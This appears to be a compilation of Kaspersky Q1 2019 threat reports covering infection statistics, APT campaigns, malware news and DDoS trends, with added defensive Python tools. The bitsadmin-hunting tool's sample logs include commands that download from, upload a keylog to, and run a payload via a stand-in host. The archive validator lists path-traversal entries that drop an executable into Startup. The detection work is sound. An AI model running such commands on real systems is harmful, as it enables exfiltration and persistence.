The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky Lab products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q1 2019, Kaspersky Lab solutions blocked 843,096,461 attacks launched from online resources located in 203 countries across the globe. 113,640,221 unique URLs were recognized as malicious by Web Anti-Virus components.

Distribution of web attack sources by country, Q1 2019

This quarter, Web Anti-Virus was most active on resources located in the US.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

#    Country*      % of attacked users**
1    Venezuela     29.76
2    Algeria       25.10
3    Greece        24.16
4    Albania       23.57
5    Estonia       20.27
6    Moldova       20.09
7    Ukraine       19.97
8    Serbia        19.61
9    Poland        18.89
10   Kyrgyzstan    18.36
11   Azerbaijan    18.28
12   Belarus       18.22
13   Tunisia       18.09
14   Latvia        17.62
15   Hungary       17.61
16   Bangladesh    17.17
17   Lithuania     16.71
18   Djibouti      16.66
19   Reunion       16.65
20   Tajikistan    16.61

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.

On average, 13.18% of Internet user computers worldwide experienced at least one Malware-class attack.

Geography of malicious web attacks in Q1 2019 (percentage of attacked users)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera/phone memory cards, and external hard drives.

In Q1 2019, our File Anti-Virus detected 247,907,593 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of users of Kaspersky Lab products on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

#    Country*       % of attacked users**
1    Uzbekistan     57.73
2    Yemen          57.66
3    Tajikistan     56.35
4    Afghanistan    56.13
5    Turkmenistan   55.42
6    Kyrgyzstan     51.52
7    Ethiopia       49.21
8    Syria          47.64
9    Iraq           46.16
10   Bangladesh     45.86
11   Sudan          45.72
12   Algeria        45.35
13   Laos           44.99
14   Venezuela      44.14
15   Mongolia       43.90
16   Myanmar        43.72
17   Libya          43.30
18   Bolivia        43.17
19   Belarus        43.04
20   Azerbaijan     42.93

* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

These statistics are based on detection verdicts returned by the OAS (on-access scan) and ODS (on-demand scan) Anti-Virus modules, received from users of Kaspersky Lab products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or on removable media connected to computers, such as flash drives, camera/phone memory cards, or external hard drives.

On average, 23.62% of user computers globally faced at least one Malware-class local threat in Q1.

23 May 2019

IT threat evolution Q1 2019

Targeted attacks and malware campaigns

Go Zebrocy

Zebrocy was first observed being used as a Sofacy backdoor in 2015. However, the collection of cases where this tool has been used mean that we consider it a subset of activity in its own right. On the basis of this threat actor’s past behaviour, we predicted last year that Zebrocy would continue to innovate in its malware development. The group has developed using Delphi, AutoIT, .NET, C# and PowerShell. Since May 2018, Zebrocy has added the “Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled open-source language.

Zebrocy continues to target government-related organizations in Central Asia, both in-country and in remote locations, as well as a new diplomatic target in the Middle East. The group also continued to innovate. Much of the spear-phishing remains thematically the same and continues to be characteristically high volume for a targeted attacker, a trend that is likely to continue. However, the remote locations of the Central Asian targets are becoming more spread out, including South Korea, the Netherlands and others. The focus to date has been on Windows, but we expect the group to keep innovating within its malware set; perhaps all of its components will soon support every platform used by its victims, including Linux and macOS.

GreyEnergy overlap with Zebrocy

GreyEnergy is believed to be a successor to the BlackEnergy group (aka Sandworm), best known for its involvement in attacks on Ukrainian energy facilities in 2015 that led to power outages. Like its predecessor, GreyEnergy has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and Zebrocy.

No direct evidence exists as to the origins of GreyEnergy, but the links between GreyEnergy and Zebrocy suggest the groups are related. Kaspersky Lab researchers have detailed how both groups shared the same C2 (command-and-control) server infrastructure for a certain period of time and how both targeted the same organization almost simultaneously, which more or less confirms the relationship between the two.

Chafer uses Remexi malware to spy on Iran-based diplomatic agencies

Throughout autumn 2018, we analyzed a long-standing (and still active at that time) cyber-espionage campaign that primarily targeted foreign diplomatic entities in Iran. The attackers used an improved version of the Remexi malware, previously associated with an APT threat actor that Symantec calls Chafer. This group has been observed since at least 2015, but based on things such as compilation time-stamps, and C2 registration, it’s possible that the group has been active for even longer. Traditionally, Chafer has focused on targets inside Iran, although its interests clearly include other countries in the Middle East.

The attackers rely heavily on Microsoft technologies on both client and server sides. The Trojan uses standard Windows utilities such as the Microsoft BITS (Background Intelligent Transfer Service) “bitsadmin.exe” to receive commands and exfiltrate data. This data includes keystrokes, screenshots, and browser-related data such as cookies and history, decrypted where possible. The C2 is based on IIS using .ASP technology to handle the victims’ HTTP requests.
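The BITS tradecraft described above (bitsadmin.exe both pulling commands and pushing data out) is also something a defender can hunt for. What follows is an added example, not Kaspersky detection logic or Remexi code: it scans process-creation records for bitsadmin invocations that transfer to or from hosts outside an allowlist, create upload jobs, or register a command to run when a job completes. The log records, host and user names, the ALLOWED_HOSTS allowlist and the 203.0.113.10 address are all constructed for illustration.

```python
"""Hunt for suspicious bitsadmin.exe usage in process-creation logs.

Added example (not Kaspersky or Remexi code). The records, the allowlist and
the 203.0.113.10 address are constructed for illustration.
"""
import json
import re
from typing import Dict, List
from urllib.parse import urlsplit

# Hosts BITS is expected to talk to in this (assumed) environment.
ALLOWED_HOSTS = {"wsus.corp.example", "download.windowsupdate.com"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records (Sysmon Event ID 1 style, one JSON object per line).
SAMPLE_LOGS = [
    r'{"host": "ws01", "user": "CORP\\jdoe", "cmdline": "bitsadmin /transfer patchjob /download /priority normal https://wsus.corp.example/kb.cab C:\\Temp\\kb.cab"}',
    r'{"host": "ws01", "user": "CORP\\jdoe", "cmdline": "bitsadmin /transfer upd /download /priority high http://203.0.113.10/cmd.txt C:\\Users\\Public\\cmd.txt"}',
    r'{"host": "ws01", "user": "CORP\\jdoe", "cmdline": "bitsadmin /create /upload exfil"}',
    r'{"host": "ws01", "user": "CORP\\jdoe", "cmdline": "bitsadmin /addfile exfil http://203.0.113.10/up/kl.log C:\\Users\\jdoe\\AppData\\Local\\Temp\\kl.log"}',
    r'{"host": "ws01", "user": "CORP\\jdoe", "cmdline": "bitsadmin /SetNotifyCmdLine upd C:\\Windows\\System32\\cmd.exe \"/c start C:\\Users\\Public\\r.exe\""}',
    r'{"host": "srv02", "user": "CORP\\svc_backup", "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1"}',
]


def analyse_bits_command(cmdline: str) -> List[str]:
    """Return the reasons a bitsadmin command line looks suspicious (empty if none)."""
    reasons: List[str] = []
    low = cmdline.lower()
    if "bitsadmin" not in low:
        return reasons
    # /transfer and /addfile both carry a remote URL; flag any host outside the allowlist.
    for url in URL_RE.findall(cmdline):
        host = (urlsplit(url).hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            reasons.append(f"transfer with unapproved host {host}")
    # /SetNotifyCmdLine makes BITS run an arbitrary program when the job finishes.
    if "/setnotifycmdline" in low:
        reasons.append("runs a command when the job completes")
    # Upload jobs push local files to a remote server: the exfiltration direction.
    if "/upload" in low:
        reasons.append("upload job (possible exfiltration)")
    return reasons


def suspicious_bits_jobs(log_lines) -> List[Dict[str, object]]:
    """Parse JSON-lines records and return those whose command line is flagged."""
    hits: List[Dict[str, object]] = []
    for line in log_lines:
        rec = json.loads(line)
        reasons = analyse_bits_command(rec.get("cmdline", ""))
        if reasons:
            hits.append({"host": rec["host"], "user": rec["user"],
                         "cmdline": rec["cmdline"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in suspicious_bits_jobs(SAMPLE_LOGS):
        print(hit["host"], hit["user"], "; ".join(hit["reasons"]))
```

On a real estate the allowlist is the interesting part: BITS is legitimate and noisy, so the signal is a job whose remote end is not a known update or software-distribution server, an upload job, or a completion command.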

New zero-day vulnerability exploited by APT threat actors

In February, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in Windows – the fourth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered recently using our technologies. Further analysis led us to uncover a zero-day vulnerability in “win32k.sys”. We reported this to Microsoft on February 22, who confirmed the vulnerability and assigned it CVE-2019-0797. Microsoft released a patch on March 12, 2019, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin with the discovery. Just as with CVE-2018-8589, we believe that this exploit is being used by several threat actors, including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT actor that we discovered only recently.

Lazarus continues to target crypto-currency exchanges

The Lazarus APT group is well-known for targeting financial organizations. In the middle of 2018, we published our report on ‘Operation AppleJeus‘, highlighting the threat actor’s focus on crypto-currency exchanges, using a fake company with a backdoored product aimed at crypto-currency businesses. One of the key findings was the group’s new ability to target Mac OS. Since then, Lazarus has expanded its operations for this platform. Further tracking of the group’s activities enabled us to discover a new operation, active since at least November 2018, which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers.

The Lazarus group continues to update its TTPs (Tactics, Techniques and Procedures) to help it fly under the radar. We would urge organizations involved in the booming crypto-currency or technological startup industry to exercise extra caution when dealing with new third parties or installing software. It’s best to check new software with an anti-virus program or at least use popular free virus-scanning services such as VirusTotal. You should never click ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources. If you need to try out new applications, it’s better to do so offline or on an isolated network virtual machine which you can erase with a few clicks. For more details on this and other research, you can subscribe to our APT intelligence reports.

Under the [Shadow]Hammer

In January, we discovered a sophisticated supply-chain attack involving the ASUS Live Update Utility, used to deliver BIOS, UEFI and software updates to ASUS laptops and desktops. The attackers added a backdoor to the utility and then distributed it to users through official channels. ASUS has a wide install base, making this an attractive target for APT threat actors. The compromised version of the utility was distributed to a large number of people between June and November 2018. Our telemetry shows that 57,000 Kaspersky Lab customers downloaded and installed it, although we believe the real scale of the problem is much bigger, possibly affecting over a million users worldwide.

The goal of the attack was to surgically target an unknown pool of users, identified by their network adapter MAC addresses. The attackers hardcoded a list of MAC addresses in the Trojanized samples, which identifies the true targets of this massive operation. We were able to extract over 600 unique MAC addresses from more than 200 samples discovered in this attack, although it’s possible that other samples exist which target different MAC addresses. We have published a tool that lets you check whether your MAC address is on the target list.
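The targeting mechanism above is easy to reproduce for a self-check. The following is an added example, not Kaspersky’s published checker: it canonicalises MAC addresses written in the usual formats, derives the digest the samples would compare against, and reports any local adapter that matches. Two things are assumptions rather than facts from this article: that the list is held as hex digests rather than raw addresses, and that the digest is MD5 over the upper-case, colon-separated form. The target list in the code is constructed so the example runs stand-alone.

```python
"""Check MAC addresses against a ShadowHammer-style target list.

Added example, not Kaspersky's published checker. Assumptions: the list is
stored as hex digests rather than raw addresses, the digest is MD5 over the
upper-case colon-separated form, and the target list below is constructed.
"""
import hashlib
import re
import uuid
from typing import Iterable, List, Set

MAC_RE = re.compile(r"^[0-9A-Fa-f]{2}([-:]?)[0-9A-Fa-f]{2}(?:\1[0-9A-Fa-f]{2}){4}$")


def normalize_mac(raw: str) -> str:
    """Canonical form: '00-50-56-c0-00-08' or '005056C00008' -> '00:50:56:C0:00:08'."""
    raw = raw.strip()
    if not MAC_RE.match(raw):
        raise ValueError(f"not a MAC address: {raw!r}")
    digits = re.sub(r"[^0-9A-Fa-f]", "", raw).upper()
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def mac_digest(mac: str) -> str:
    """Digest as assumed to be stored in the target list (MD5 of the canonical form)."""
    return hashlib.md5(normalize_mac(mac).encode("ascii")).hexdigest()


def targeted(macs: Iterable[str], target_digests: Set[str]) -> List[str]:
    """Return the input MACs whose digest appears in the target list."""
    return [m for m in macs if mac_digest(m) in target_digests]


def local_macs() -> List[str]:
    """Best effort with the standard library: uuid.getnode() yields one adapter's MAC,
    or a random number with the multicast bit set when no adapter was found."""
    node = uuid.getnode()
    if node & (1 << 40):  # multicast bit set: random fallback, not a real adapter
        return []
    return [normalize_mac(f"{node:012X}")]


# Constructed target list. A real list holds digests only; the plaintext MACs
# here exist solely so the example is self-contained.
TARGET_DIGESTS = {mac_digest(m) for m in ("00:50:56:C0:00:08", "3C-97-0E-12-34-56")}

if __name__ == "__main__":
    for mac in targeted(local_macs(), TARGET_DIGESTS):
        print("adapter on the target list:", mac)
```

uuid.getnode() reports a single adapter; on a multi-homed machine, feed targeted() the full adapter list from ipconfig /all or ip link instead.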

Other malware news

Razy Trojan steals crypto-currency

While many browser extensions make our lives easier, some are altogether more dangerous, bombarding us with advertising or collecting information about our activities. Some are even designed to steal money. We recently reported the Razy Trojan, malware that installs a malicious browser extension on the victim’s computer or infects an already installed extension. To do so, it disables the integrity check for installed extensions and automatic updates for the targeted browser. The Trojan works with Google Chrome, Mozilla Firefox and Yandex browsers, though it has different infection scenarios for each browser type. Razy spreads via advertising blocks on websites and is distributed from free file-hosting services under the guise of legitimate software. Razy serves several purposes, mostly related to the theft of crypto-currency. Its main tool, the script ‘main.js’, is capable of searching for addresses of crypto-currency wallets on websites and replacing them with the attacker’s wallet addresses, spoofing images of QR codes pointing to wallets, modifying the web pages of crypto-currency exchanges and spoofing Google and Yandex search results.

Turning ATMs into slot machines

‘Jackpotting’ refers to the fraudulent methods used by criminals to obtain cash from ATMs. One recent example is the WinPot malware. The malware is notable because the criminals designed the user interface to resemble a slot machine.

However, unlike the machines in a casino, an ATM infected with WinPot always pays out – to the criminals. The malware window displays the denomination of banknotes for each cassette, so that the money mule operating the malware just needs to select the cassette with the most money in it and press ‘Spin’. The ‘Scan’ button can be used to recount the notes. The authors also include an emergency ‘Stop’ button, to allow the mule to cut short the pay out so as not to arouse suspicion.

There are several versions of the malware, and while their core functionality is essentially the same, there are some differences. For example, some versions will only dispense cash for a limited period of time and then they deactivate themselves. As with Cutlet Maker, WinPot is available on the Darknet for between $500 and $1,000, depending on the version.

To block attacks of this kind, we recommend that banks adopt device control and whitelisting. The former will block attempts to implant malware in the ATM using a USB device, while the latter will prevent execution of unauthorized software on the ATM. Kaspersky Embedded Systems Security can be used to secure ATMs.

Pirate Matryoshka

Using torrent trackers to spread malware is a well-known practice: cybercriminals disguise it as popular software, computer games, media files and other sought-after content. Earlier this year we detected one such campaign, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies of paid programs. The tracker contained malicious torrents created from dozens of different accounts, including some registered on TPB for quite some time. Instead of the expected software, the downloaded file was a Trojan, Pirate Matryoshka, whose basic logic was implemented by SetupFactory installers.

During the initial stage, the installer decrypts another SetupFactory installer to display a phishing web page. This page opens directly in the installation window and requests the user’s TPB account credentials, supposedly to continue the process. The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence. The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (which Kaspersky Lab classifies as adware). These usually find their way on to people’s computers through file sharing sites. Besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel.

The other two files are auto-clickers written in Visual Basic that are required to prevent the user from canceling the installation of additional software (in which case the cybercriminals would go away empty-handed). The auto-clickers are run before the installers: when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

Pirate Matryoshka results in the victim being flooded with unwanted programs. The owners of file partner programs often do not track the programs offered in their downloaders: our research shows that one in five files offered by partner installers is malicious, including pBot, Razy and others.

Mirai now used to target enterprise devices

Researchers from Palo Alto Networks’ Unit 42 recently reported a new variant of Mirai, the infamous IoT botnet. This malware is best known for its use in a massive DDoS attack on the servers of DNS provider Dyn, in 2016. The botnet is now equipped with a much wider range of exploits, which makes it even more dangerous and allows it to spread faster.

More troubling is the fact that the new strain is targeting not only its usual victims – routers, IP cameras, and other ‘smart’ things – but also enterprise IoT devices. This is no surprise since the Mirai source code was leaked some time ago, allowing any attacker with sufficient programming skills to use it. This explains why this botnet features highly in our report, ‘DDoS attacks in Q4 2018‘; and the fact that, in our report, ‘New trends in the world of IoT threats‘, Mirai is responsible for 21% of all IoT infections.

It is possible that future waves of Mirai infections might even include industrial IoT devices.

To reduce the risk of Mirai infection, we recommend that you install patches and firmware updates as soon as they become available, monitor traffic coming from each device for abnormalities, change default passwords and enforce an effective password policy for staff, and reboot any device that is behaving strangely (this will remove the malware from the device, but will not, on its own, prevent re-infection). To help companies protect themselves against the latest IoT-related threats we have released a new intelligence data feed for IoT-related threats.

‘Collection #1’ and other data leaks

On January 17, security researcher Troy Hunt reported a leak of more than 773 million email addresses and 21 million unique passwords. The data, dubbed ‘Collection #1’, was originally shared on the popular cloud service MEGA. Collection #1 is just a small part of a bigger leak of about 1TB of data, split into seven parts and distributed through a data-trading forum. The full package is a collection of credentials leaked from different sources during the past few years, the most recent being from 2017, so we were unable to identify any more recent data in this ‘new’ leak. The new data dump, dubbed ‘Collection #2-5’, was discovered by researchers at the Hasso Plattner Institute in Potsdam.

In February, further data dumps occurred. Details of 617 million accounts, stolen from 16 hacked companies, were put up for sale on Dream Market, accessible via the Tor network. The hacked companies include Dubsmash, MyFitnessPal, Armor Games and CoffeeMeetsBagel. Subsequently, data from a further eight hacked companies was posted to the same market place. Then in March, the hacker behind the earlier data dumps posted stolen data from a further six companies.

One of the particularly worrying aspects of these leaks is the fact that not all of the companies affected had previously reported the data breaches.

The impact on a company affected by a data breach goes beyond the loss of data. It includes the costs of investigating the breach, closing any security loopholes and maintaining business continuity. On top of that, a company’s reputation can be affected, especially if it becomes clear that the company failed to take adequate steps to secure the personal data of its customers.

The impact on customers can also be dramatic, especially if they use the same login credentials to access other online services. We have published advice on how to mitigate the impact of a data breach.

Social engineering

In our threat predictions for 2019, we described social engineering as the most successful infection vector ever and indicated why we thought it would remain so. The key to its success lies in sparking the curiosity of potential victims. Massive data leaks, such as the ones discussed above, help attackers to fine-tune their approach, making it more successful. Phishers will latch on to any topic that they think will pique the interest of their victims. We saw this recently in a campaign that hooked into events in Venezuela.

On February 10, Juan Guaido made a public call for volunteers to join a new movement called ‘Voluntarios por Venezuela’ (Volunteers for Venezuela), to help international organizations deliver humanitarian aid to the country. The original website asks volunteers to provide their full name, personal ID, cell phone number, and whether they have a medical degree, a car, or a smartphone, and also their location. The volunteers sign up and then receive instructions on how to help.

Just a few days after the legitimate site appeared, an almost identical website appeared. Both the legitimate and fake sites used TLS certificates from Let’s Encrypt, so the browser padlock gave no warning. The scariest aspect was that these two different domains, with different owners, were resolved within Venezuela to the same IP address, belonging to the fake domain owner. So it didn’t matter if a volunteer opened the legitimate domain name or the fake one: in the end their personal information was submitted to a fake site.

In this scenario, where DNS servers are being manipulated, we would strongly recommend using public DNS resolvers such as Google Public DNS or the Cloudflare and APNIC resolver. We also recommend using VPN connections that do not hand DNS queries to a third-party resolver.
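The manipulation described above leaves a simple fingerprint: the answer the local network hands out for the legitimate domain shares no address with what independent resolvers return, and two unrelated domains collapse onto one address. The check below is an added example, not from the original article. Resolvers are passed in as callables so the logic can be exercised offline against constructed answer tables; on a real network you would pass system_resolver as the local side and resolvers that query public DNS servers as the references. The domain names are placeholders and the addresses come from the TEST-NET ranges.

```python
"""Compare the system resolver's answers with independent reference resolvers.

Added example, not from the original article. Resolvers are plain callables
so the check runs offline against constructed answer tables; the domain names
are placeholders and the addresses are from the TEST-NET ranges.
"""
import socket
from typing import Callable, Dict, Iterable, List, Set

Resolver = Callable[[str], Set[str]]


def system_resolver(name: str) -> Set[str]:
    """The OS resolver: on a manipulated network this is the answer under attack."""
    return {sockaddr[0] for _, _, _, _, sockaddr in socket.getaddrinfo(name, None, socket.AF_INET)}


def table_resolver(table: Dict[str, Set[str]]) -> Resolver:
    """Resolver backed by a fixed table (stands in for querying a public resolver)."""
    return lambda name: set(table.get(name, ()))


def check_domains(names: Iterable[str], local: Resolver, references: Dict[str, Resolver]) -> List[str]:
    """Report names whose local answer shares no address with any reference answer,
    and addresses onto which the local resolver collapses several names when the
    references do not (a shared CDN address would also be shared in the references)."""
    findings: List[str] = []
    local_answers = {n: local(n) for n in names}
    ref_answers = {n: set().union(*(r(n) for r in references.values())) for n in local_answers}
    for n, ips in local_answers.items():
        if not ips & ref_answers[n]:
            findings.append(f"{n}: local {sorted(ips)} vs references {sorted(ref_answers[n])}")
    by_ip: Dict[str, Set[str]] = {}
    for n, ips in local_answers.items():
        for ip in ips:
            by_ip.setdefault(ip, set()).add(n)
    for ip, ns in by_ip.items():
        shared_in_refs = all(ip in ref_answers[n] for n in ns)
        if len(ns) > 1 and not shared_in_refs:
            findings.append(f"{ip}: local resolver maps {sorted(ns)} to one address")
    return findings


# Constructed answers: what honest resolvers return ...
REFERENCE_ANSWERS = {
    "volunteers-real.example": {"198.51.100.10"},
    "volunteers-fake.example": {"203.0.113.5"},
    "unrelated.example": {"192.0.2.1"},
}
# ... and what the manipulated in-country resolver returns for the same names.
TAMPERED_LOCAL_ANSWERS = {
    "volunteers-real.example": {"203.0.113.5"},  # hijacked onto the fake site's host
    "volunteers-fake.example": {"203.0.113.5"},
    "unrelated.example": {"192.0.2.1"},
}
DOMAINS = list(REFERENCE_ANSWERS)
REFERENCE_RESOLVERS = {"ref-a": table_resolver(REFERENCE_ANSWERS),
                       "ref-b": table_resolver(REFERENCE_ANSWERS)}

if __name__ == "__main__":
    for line in check_domains(DOMAINS, table_resolver(TAMPERED_LOCAL_ANSWERS), REFERENCE_RESOLVERS):
        print(line)
```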

LockerGoga ransomware attacks

Ransomware continues to be a problem for consumers and businesses alike, notwithstanding a relative decline in numbers in the last two years. In 2018, we blocked 765,538 crypto-ransomware attacks on computers protected by Kaspersky Lab products, around 220,000 of them on corporate customers’ machines.

The most recent to hit the headlines is LockerGoga, which recently compromised the systems of Altran, Norsk Hydro and other companies. It’s unclear who’s behind the attacks, what they want and the mechanism used to first infect its victims. It’s not even clear if LockerGoga is ransomware or a wiper. The malware encrypts data and displays a ransom note asking victims to get in touch to arrange decryption, in return for an (unspecified) payment in bitcoins.

However, later versions were observed by researchers that forcibly log victims off infected systems by changing their passwords, and removing their ability to even log back in to the system. In such cases, the victims may not even get to see the ransom note.

19-year-old bug in WinRAR

Recently, researchers from Check Point discovered a long-standing vulnerability in the popular WinRAR utility – used by around 500 million people worldwide. This path traversal zero-day vulnerability (CVE-2018-20250) enables attackers to specify arbitrary destinations during file extraction of ‘ACE’-formatted files, regardless of user input.

This vulnerability has been fixed in the latest version of WinRAR (5.70), but since WinRAR itself does not contain an auto-update feature, it’s probable that many existing users will continue to run out-of-date versions.
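The bug class above is the one every extractor has to defend against: an entry name chosen by the archive author must never be allowed to select the destination. The check below is an added example, not WinRAR or ACE code. It applies Windows path rules through ntpath so it runs on any OS, rejects drive-qualified, UNC and root-relative names, and verifies after normalisation that the target still sits under the extraction directory. The entry names and the destination directory are constructed.

```python
"""Validate archive entry names before extraction.

Added example (not WinRAR or ACE code): the generic check an extractor must make
so that an entry name chosen by the archive author cannot select the destination.
Windows path rules via ntpath so it runs on any OS; names below are constructed.
"""
import ntpath
from typing import Iterable, List, Tuple


def safe_extract_path(dest_dir: str, entry_name: str) -> str:
    """Return the absolute path an entry may be written to, or raise ValueError."""
    if not entry_name or "\x00" in entry_name:
        raise ValueError("empty or NUL-containing entry name")
    name = entry_name.replace("/", "\\")
    drive, _ = ntpath.splitdrive(name)
    if drive or name.startswith("\\"):
        # 'C:\...', '\\server\share\...' or '\Windows\...' would ignore dest_dir entirely
        raise ValueError(f"absolute or drive-qualified entry: {entry_name!r}")
    dest = ntpath.normpath(dest_dir)
    target = ntpath.normpath(ntpath.join(dest, name))
    # After normalisation every '..' has been resolved; the result must still sit under dest.
    if target != dest and not target.lower().startswith(dest.rstrip("\\").lower() + "\\"):
        raise ValueError(f"entry escapes extraction directory: {entry_name!r}")
    return target


def is_safe_entry(dest_dir: str, entry_name: str) -> bool:
    try:
        safe_extract_path(dest_dir, entry_name)
        return True
    except ValueError:
        return False


def audit_entries(dest_dir: str, names: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (name, reason) for every entry that must not be extracted."""
    rejected: List[Tuple[str, str]] = []
    for n in names:
        try:
            safe_extract_path(dest_dir, n)
        except ValueError as exc:
            rejected.append((n, str(exc)))
    return rejected


# Constructed entry names as an attacker might place them in an archive.
SAMPLE_ENTRIES = [
    "readme.txt",
    "docs/a/../b.txt",
    r"..\..\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\evil.exe",  # would run at next logon
    r"C:\Windows\System32\drivers\etc\hosts",
    r"\\fileserver\share\evil.exe",
    r"sub\..\..\evil.exe",
]

if __name__ == "__main__":
    for name, reason in audit_entries(r"C:\Users\alice\Downloads\pkg", SAMPLE_ENTRIES):
        print(f"REJECT {name}: {reason}")
```

The same rule applies to symlink and hardlink entries in other formats: resolve, then compare against the destination, and refuse anything that lands outside it.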

The internet of secure, and not so secure, things

The use of smart devices is increasing. Some forecasts suggest that by 2020 the number of smart devices will exceed the world’s population several times over. These include household objects such as TVs, smart meters, thermostats, baby monitors and children’s toys, as well as cars, medical devices, CCTV cameras and parking meters. This offers a broad attack surface for anyone looking to take advantage of security weaknesses – for whatever purpose. Sadly, all too often we see reports of vulnerabilities in smart devices that could leave both consumers and organizations open to attack.

In February, at MWC19, researchers from our ICS CERT presented a report on the security of artificial limbs developed by Motorica. They looked at three aspects: firmware, the handling of data and the security of data in the cloud.

On the plus side, they found no vulnerabilities in the firmware of the prosthetic limbs themselves, or in the handling of data – since data flows one way only, from the limb to the cloud, it’s not possible to hack the device and take control of it remotely. However, they did find flaws in the development of the cloud infrastructure that could allow an attacker to gain access to data from the smart limb.

Werner Schober, a researcher at SEC Consult took an intimate look at the security of a sex toy. The device, designed to connect to an Android or iOS smartphone using Bluetooth, is controlled through a special app, either locally or remotely. On top of this, the app features a fully-fledged social network with group chats, photo galleries, friend-lists and more. The researcher was able to access the data of all users of the device, including usernames, passwords, chats, images and videos. Even worse, he was able to find a way to control the devices of other users. There was no mechanism for updating the firmware. However, he was able to find interfaces on the device that the manufacturer had used for debugging purposes and forgotten to close.

Researchers at Pen Test Partners recently discovered a flaw that exposes the sensitive data of children wearing GPS tracking watches, including their name, parents’ details and real-time location information. The cause was a privilege escalation vulnerability in the backend: the system failed to validate that the user had the appropriate permission to obtain admin control, so an attacker with access to the watch’s credentials could change the permissions at the backend and gain access to the account information and data stored on the watch.

It’s essential that vendors consider security when products are being designed. However, it’s also vital that consumers consider security before buying any connected device. This includes disabling functions that you don’t need – or even asking yourself if you need a connected version of the device at all. It also means looking online for information about any vulnerabilities that may have been reported and checking to see if it’s possible to update the firmware on the device. Finally, it’s important to change the default password and replace it with a unique, complex password. You can use the free Kaspersky IoT Scanner to check your Wi-Fi network and tell you if the devices connected to it are safe.

May 21, 2019

DDoS attacks in Q1 2019

News overview

The start of the year saw the appearance of various new tools in the arsenal of DDoS-attack masterminds. In early February, for instance, the new botnet Cayosin, assembled from elements of Qbot, Mirai, and other publicly available malware, swam into view. Cybersecurity experts were intrigued less by the mosaic structure and frequent updating of its set of exploited vulnerabilities than by the fact that it was advertised (as a DDoS service) not on the dark web, but through YouTube. What’s more, it is up for sale on Instagram (botnetters are clearly making the most of the opportunities afforded by social media). In tracing the cybercriminals’ accounts, the researchers stumbled upon other malware and botnets as well, including the already discovered Yowai.

Mid-March turned up another find in the shape of a new version of Mirai, geared towards attacking business devices. The malware is now able to “botnetize” not only access points, routers, and network cameras, but wireless presentation and digital signage systems, too.

Despite all this, the number of observed high-profile attacks using new and not-so-new botnets was not that high. At the end of winter, the University at Albany (UAlbany) in the US came under assault: during the February 5 – March 1 period, 17 attacks were made on it, downing the university servers for at least five minutes. Data belonging to students and staff was not affected, but some services were unavailable; the head of IT security at UAlbany believes that the university was specifically targeted.

In early February, the website of the National Union of Journalists of the Philippines was also hit. The site was disabled for several hours by a series of powerful attacks, peaking at 468 GB/s of traffic. The attack was part of a widespread campaign against various news resources. The targets believe themselves to be the victims of political pressure on alternative sources of information.

Also in mid-March, Facebook encountered serious problems with its services when Facebook and Instagram users were unable to log into their accounts. Many observers consider the incident to be DDoS-related. However, Facebook itself rejects this version of events, meaning that the real cause can only be guessed at.

The lack of news about serious DDoS attacks coincided with a rise in the number of reports of major police operations against attack organizers, accompanied by arrests and charges.

The fight to bring down resources used for DDoS attacks continues: in early January, the US Department of Justice seized 15 Internet domains from which a series of DDoS attacks was launched last December. According to DoJ documents, those domains were used to carry out attacks on government systems, ISPs, universities, financial institutions, and gaming platforms worldwide.

